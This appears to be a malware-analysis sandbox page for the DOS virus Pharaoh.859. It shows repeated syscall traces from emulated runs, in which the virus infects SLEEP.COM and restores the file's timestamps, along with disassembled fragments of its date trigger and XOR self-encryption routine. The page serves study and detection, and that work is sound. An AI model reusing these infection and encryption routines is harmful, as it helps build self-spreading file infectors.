Sample viewer

vx.netlux.org/Virus.DOS.Pharaoh.859

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:22:05.398645497Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5
0x12ac1: jne 0x12b0e
0x12ac3: cmp dl, 0x19
0x12ac6: jbe 0x12b0e
0x12ac8: cmp cx, 0x7c8
0x12acc: jg 0x12ad3
0x12ace: cmp dh, 0xb
0x12ad1: jb 0x12b0e
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10
0x12ad9: lea dx, word ptr [bp + 0x30f]
0x12add: mov ah, 9
0x12adf: int 0x21
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21
0x12aeb: mov ah, 2
0x12aed: mov dx, 0
2018-12-17T22:22:05.401676578Z 71 PC: 12b2e | Get current directory
2018-12-17T22:22:05.40517135Z 26 PC: 12b35 | Set disk transfer address
2018-12-17T22:22:05.406387075Z 25 PC: 12b39 | Get default drive
2018-12-17T22:22:05.407593762Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:22:05.413432961Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:22:05.414775546Z 78 PC: 12b68 | Find first file
2018-12-17T22:22:05.421472407Z 67 PC: 12cac | Get or set file attributes
2018-12-17T22:22:05.428245252Z 67 PC: 12cac | Get or set file attributes
2018-12-17T22:22:05.441119069Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:22:05.445587873Z 66 PC: 12ca0 | Move file pointer
2018-12-17T22:22:05.44742635Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:22:05.4516524Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl
0x12bfe: mov cx, 0x35b
0x12c01: lea si, word ptr [bp + 0x100]
0x12c05: mov di, 0xfc00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17
0x12c10: nop
0x12c11: mov di, si
0x12c13: mov cx, 0x344
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx
0x12c1e: mov al, 2
0x12c20: call 0x12c98
2018-12-17T22:22:05.453613483Z 66 PC: 12ca0 | Move file pointer
2018-12-17T22:22:05.45554059Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-17T22:22:05.464626365Z 66 PC: 12ca0 | Move file pointer
2018-12-17T22:22:05.465868674Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:22:05.473318672Z 87 PC: 12c4e | Get or set file date and time
2018-12-17T22:22:05.474799686Z 87 PC: 12c5a | Get or set file date and time
2018-12-17T22:22:05.476384213Z 62 PC: 12c5f | Close file
2018-12-17T22:22:05.485673207Z 67 PC: 12c69 | Get or set file attributes
2018-12-17T22:22:05.496749033Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:22:05.503710037Z 59 PC: 12c93 | Change current directory
2018-12-17T22:22:05.508766117Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:19.396081922Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5
0x12ac1: jne 0x12b0e
0x12ac3: cmp dl, 0x19
0x12ac6: jbe 0x12b0e
0x12ac8: cmp cx, 0x7c8
0x12acc: jg 0x12ad3
0x12ace: cmp dh, 0xb
0x12ad1: jb 0x12b0e
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10
0x12ad9: lea dx, word ptr [bp + 0x30f]
0x12add: mov ah, 9
0x12adf: int 0x21
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21
0x12aeb: mov ah, 2
0x12aed: mov dx, 0
2018-12-25T11:50:19.398941299Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:19.403077083Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:19.404184752Z 25 PC: 12b39 | Get default drive
2018-12-25T11:50:19.405550987Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.406806376Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.408195643Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:19.414623856Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:19.426288232Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:19.444161425Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:19.451646958Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:19.453895861Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:50:19.461075043Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl
0x12bfe: mov cx, 0x35b
0x12c01: lea si, word ptr [bp + 0x100]
0x12c05: mov di, 0xfc00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17
0x12c10: nop
0x12c11: mov di, si
0x12c13: mov cx, 0x344
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx
0x12c1e: mov al, 2
0x12c20: call 0x12c98
2018-12-25T11:50:19.464385486Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:19.46721295Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:19.493809779Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:19.495763461Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:19.503973178Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:19.506113801Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:19.507661593Z 62 PC: 12c5f | Close file
2018-12-25T11:50:19.516120506Z 67 PC: 12c69 | Get or set file attributes
2018-12-25T11:50:19.527962856Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.529371404Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:19.533704941Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:19.443398658Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5
0x12ac1: jne 0x12b0e
0x12ac3: cmp dl, 0x19
0x12ac6: jbe 0x12b0e
0x12ac8: cmp cx, 0x7c8
0x12acc: jg 0x12ad3
0x12ace: cmp dh, 0xb
0x12ad1: jb 0x12b0e
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10
0x12ad9: lea dx, word ptr [bp + 0x30f]
0x12add: mov ah, 9
0x12adf: int 0x21
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21
0x12aeb: mov ah, 2
0x12aed: mov dx, 0
2018-12-25T11:50:19.446240528Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:19.448886263Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:19.449826846Z 25 PC: 12b39 | Get default drive
2018-12-25T11:50:19.459312121Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.460375299Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.461457946Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:19.47709848Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:19.482711103Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:20.326976432Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:20.353185383Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:20.354645141Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:50:20.361183548Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl
0x12bfe: mov cx, 0x35b
0x12c01: lea si, word ptr [bp + 0x100]
0x12c05: mov di, 0xfc00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17
0x12c10: nop
0x12c11: mov di, si
0x12c13: mov cx, 0x344
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx
0x12c1e: mov al, 2
0x12c20: call 0x12c98
2018-12-25T11:50:20.363913974Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:20.365317016Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:20.400331248Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:20.402028851Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:20.408508996Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:20.409777201Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:20.411586929Z 62 PC: 12c5f | Close file
2018-12-25T11:50:20.448330238Z 67 PC: 12c69 | Get or set file attributes
2018-12-25T11:50:20.485541428Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:20.48636537Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:20.489360729Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":25,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:19.767365957Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5
0x12ac1: jne 0x12b0e
0x12ac3: cmp dl, 0x19
0x12ac6: jbe 0x12b0e
0x12ac8: cmp cx, 0x7c8
0x12acc: jg 0x12ad3
0x12ace: cmp dh, 0xb
0x12ad1: jb 0x12b0e
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10
0x12ad9: lea dx, word ptr [bp + 0x30f]
0x12add: mov ah, 9
0x12adf: int 0x21
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21
0x12aeb: mov ah, 2
0x12aed: mov dx, 0
2018-12-25T11:50:19.770849066Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:19.774230756Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:19.775554465Z 25 PC: 12b39 | Get default drive
2018-12-25T11:50:19.776931625Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.779267515Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.780510216Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:19.787813811Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:19.794292011Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:19.811774943Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:19.819145262Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:19.82124621Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:50:19.829096569Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl
0x12bfe: mov cx, 0x35b
0x12c01: lea si, word ptr [bp + 0x100]
0x12c05: mov di, 0xfc00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17
0x12c10: nop
0x12c11: mov di, si
0x12c13: mov cx, 0x344
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx
0x12c1e: mov al, 2
0x12c20: call 0x12c98
2018-12-25T11:50:19.831965599Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:19.834628304Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:19.844416588Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:19.84601616Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:19.852126296Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:19.855036104Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:19.857096976Z 62 PC: 12c5f | Close file
2018-12-25T11:50:19.866542617Z 67 PC: 12c69 | Get or set file attributes
2018-12-25T11:50:19.879145824Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.880850146Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:19.885829302Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":7,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:19.893964713Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5
0x12ac1: jne 0x12b0e
0x12ac3: cmp dl, 0x19
0x12ac6: jbe 0x12b0e
0x12ac8: cmp cx, 0x7c8
0x12acc: jg 0x12ad3
0x12ace: cmp dh, 0xb
0x12ad1: jb 0x12b0e
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10
0x12ad9: lea dx, word ptr [bp + 0x30f]
0x12add: mov ah, 9
0x12adf: int 0x21
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21
0x12aeb: mov ah, 2
0x12aed: mov dx, 0
2018-12-25T11:50:19.897083481Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:19.89950703Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:19.90065305Z 25 PC: 12b39 | Get default drive
2018-12-25T11:50:19.902579004Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.903693667Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:19.904814042Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:19.911448644Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:19.921609323Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:21.025182698Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:21.029966322Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:21.031072916Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:50:21.061305486Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl
0x12bfe: mov cx, 0x35b
0x12c01: lea si, word ptr [bp + 0x100]
0x12c05: mov di, 0xfc00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17
0x12c10: nop
0x12c11: mov di, si
0x12c13: mov cx, 0x344
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx
0x12c1e: mov al, 2
0x12c20: call 0x12c98
2018-12-25T11:50:21.063467305Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:21.065067178Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:21.130440388Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:21.131758678Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:21.14609567Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:21.148194264Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:21.149520535Z 62 PC: 12c5f | Close file
2018-12-25T11:50:21.193430786Z 67 PC: 12c69 | Get or set file attributes
2018-12-25T11:50:21.275645491Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:21.276686814Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:21.281171062Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:20.047332778Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5
0x12ac1: jne 0x12b0e
0x12ac3: cmp dl, 0x19
0x12ac6: jbe 0x12b0e
0x12ac8: cmp cx, 0x7c8
0x12acc: jg 0x12ad3
0x12ace: cmp dh, 0xb
0x12ad1: jb 0x12b0e
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10
0x12ad9: lea dx, word ptr [bp + 0x30f]
0x12add: mov ah, 9
0x12adf: int 0x21
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21
0x12aeb: mov ah, 2
0x12aed: mov dx, 0
2018-12-25T11:50:20.050016824Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:20.052881072Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:20.053900917Z 25 PC: 12b39 | Get default drive
2018-12-25T11:50:20.055700273Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:20.057884629Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:20.058888837Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:20.06534471Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:20.070944211Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:21.025293313Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:21.031775831Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:21.034590447Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:50:21.062280172Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl
0x12bfe: mov cx, 0x35b
0x12c01: lea si, word ptr [bp + 0x100]
0x12c05: mov di, 0xfc00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17
0x12c10: nop
0x12c11: mov di, si
0x12c13: mov cx, 0x344
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx
0x12c1e: mov al, 2
0x12c20: call 0x12c98
2018-12-25T11:50:21.064445788Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:21.06662573Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:21.130479532Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:21.132633986Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:21.140415825Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:21.141859687Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:21.143059921Z 62 PC: 12c5f | Close file
2018-12-25T11:50:21.189287147Z 67 PC: 12c69 | Get or set file attributes
2018-12-25T11:50:21.244089118Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:50:21.245159847Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:21.249164454Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')